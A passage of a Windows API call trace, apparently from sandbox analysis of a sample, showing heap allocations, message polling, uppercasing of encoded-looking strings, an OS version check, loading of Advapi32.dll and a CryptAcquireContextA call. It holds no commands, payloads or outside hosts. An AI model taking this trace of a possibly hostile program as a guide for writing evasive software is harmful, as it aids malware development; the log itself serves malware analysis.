RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0195.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.178] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.178] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.178] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.179] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.179] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.179] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.180] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.180] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.181] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.182] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.182] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.182] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.182] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.183] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0195.183] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.183] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.183] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.184] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.184] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.185] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.185] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.185] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0195.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0195.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0195.186] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.186] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.186] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.186] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.186] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.186] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0195.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.187] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6150) returned 1 [0195.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.239] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.239] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0195.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.239] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0195.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.240] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.240] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.241] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 